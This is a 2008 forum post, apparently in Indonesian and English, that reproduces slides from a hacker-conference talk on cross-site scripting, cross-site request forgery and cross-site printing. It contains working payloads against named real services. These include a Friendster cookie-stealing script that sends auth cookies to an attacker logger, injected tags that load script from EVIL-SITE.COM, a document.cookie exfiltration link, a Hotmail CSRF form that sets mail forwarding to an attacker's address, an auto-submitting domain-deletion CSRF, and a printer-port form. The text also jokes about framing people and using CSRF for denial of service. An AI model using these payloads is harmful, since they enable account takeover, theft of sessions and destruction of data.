Sumber : Presentasi Hacker's Night Day by Anselmus Ricky (Th0R)
Judul : The X
~ Cross Site Scripting (XSS)
~ Cross Site Request Forgery (CSRF)
~ Cross Site Printing (XSP)
~ Malicious JavaScript
Payload of an XSS, CSRF and/or XSP attacks. Typically written in JavaScript, and executed in a browser.
Cross Site Scripting (XSS)
Forcing malicious content to be served by a trusted website to an unsuspecting user.
Being hacked with an Cross Site Scripting (XSS) Attacks!
~ Website owner embedded his own website with a malicious javascript.
~ Website defaced with embedded javascript malware.
~ Javascript malware injected into a public area of a website (Persistent XSS).
~ Click on a specially-crafted link causing the website to echo javascript malware (Non-Persistent XSS).
Type of XSS
~ Persistent XSS
The persistent or Type 2 XSS vulnerability is also referred to as a stored or second-order vulnerability, and it allows the most powerful kinds of attacks. A type 2 XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities
~ Non-persistent XSS
The non-persistent or Type 1 cross-site scripting hole is also referred to as a reflected vulnerability, and is by far the most common type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user
Non-persistent XSS
Example:
http://protocollo.gov.it/01RiepIni.asp?NI="><script>alert(“Th0R%20was%20Here!")</script>http://www.friendster.com/gallery.php?_ ... own&kword=[PUT XSS CODE HERE]
http://www.friendster.com/gallery.php?_ ... Fscript%3E
http://www.friendster.com/gallery.php?_ ... /script%3E
File.js
var pUrl=window.location.href.search(/profiles\./),pV=pageViewerID,pO=pageOwnerID,pN=pageViewerFName;
var cLoger=”YOUR_LOGER_FILE.PHP”,ck=fgetCookie(”friendster_auth”);
fr=document.createElement(’iframe’);
fr.height=’0′;fr.width=’0′;fr.frameBorder=’0′;
fr.src=cLoger+’?c=’+escape(ck)+’&s=’+escape(pN)+’~'+pV+’~@’+pO;navigation.appendChild(fr);
Filejs2.txt
fr=document.createElement(’iframe’);fr.height=’0′;fr.width=’0′;fr.frameBorder=’0′;fr.src=’http://www.friendster.com/gallery.php?_submitted=1&ktype=hometown&kword=%3C/script%3E%3Cscript%20src%3D%22http%3A//EVIL-SITE.COM/filejs.js%22%3E%3C/script%3E’;flo1t.appendChild(fr);
Injected Code
<img xmlns:dict=”dict” alt=”star” src=”http://images.friendster.com/images/rating_star.gif” onLoaD =”a=document.createElement(’script’);a.src=’http://EVIL-SITE.COM/filejs2.txt’;flo1t.appendChild(a)” style=height:0;width:0>
Example:
~ Bulletin Board Attack (Where HTML posting are allowed).
~ <pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document·cookie' b='<pre' >
~ Email Hacking (Tested on Yahoo and Gmail quite long time ago).
~ etc
Cross Site Request Forgery (CSRF)
Also known as XSRF or 1-click attack or sidejacking, forcing an unsuspecting user’s browser to send request they didn’t intend.
The use of Cross Site Request Forgery (CSRF) to hack!
~ Can be used in order to hack/break into several free mail providers in this world, such as
http://www.hotmail.com~ If you want to send someone to Jail just because they clicked on your built-up links, then you can do It with CSRF! I myself name it 1-Click to Jail!
~ CSRF attacks are also usable for boosting up more powers on several other kind of attacks such as Denial of Service (DoS) and/or Distributed Denial of Service (DDoS).
CSRF on Hotmail Video
Can be downloaded here:
http://www.th0r.info/products/clip0001.rarCSRF on Hotmail Hacking
~ *.html files attached within emails:
<html>
<body>
<bOdy onload=”document.CSRF.submit()”>
<form name=”CSRF” method=”POST” action=”http://by138w.bay138.mail.live.com/mail/options.aspx?subsect
ion=32&n=487173350&resend=0″ style=”display:none”>
</body>
</html>
~ Actual link:
http://by111w.bay111.mail.live.com/mail ... ection=32&
amp;n=487173350&resend=0&gs=true&ctl02%24SaveBu
tton=true%ctl02%24ForwardingToggle=2&ctl02%24AddressTextB
ox=binus_2_0_0_4@hotmail.com
Better Clue: “You need an iFrame”
Doing DoS by using CSRF
All equipments you need:
~ Browser (Can be IE/FireFox/Safari/etc).
~ A website that can help you on doing Sitemap Generator.
~ A little program to do the looping.
~ Your hands and eyes to watch over the victim’s website.
Annoying CSRF
Look at this:
<form name=”f” action=”http://www.uni.cc/site/dcp_ddelete1.php” method=”POST”>
<input type=”hidden” name=”DN” value=”testdoank.uni.cc“>
<input type=”submit” name=”s” class=”btn” value=”Click here to see my HOT Pics”>
</form>
<script language=”javascript”>
document.forms[0].submit()
</script>
Cross Site Printing (XSP)
Forcing malicious content to be served by a trusted website to several specific Intranet Network and an unsuspecting printers.
What you can do with Cross Site Printing?!
<FORM Action='http://YOURPRINTER:9100' ID='MsgForm' ENCTYPE='Multipart/Form-data' Method='POST'> <TEXTAREA NAME='MSG' ID='MSG' WRAP='NONE' ROWS='50' COLS='100'> Testing this printer out. </TEXTAREA><INPUT TYPE=SUBMIT Value=SUBMIT></FORM>
Most of today’s Cross Site scripting attacks are using this kind of trick:
http://bbs.cn.yahoo.com/searchApplyBoar ... 0Pg==.html
Translated into human tounge as - <script>alert("XSS-bypass-No-Script")</script>
Sory neh kalo ane gak bisa translate, lagian pasti dikit2 ngerti dong...
Dan sory banget kalo lancang langsung buat post...
Thu Jul 03, 2008 4:53 am
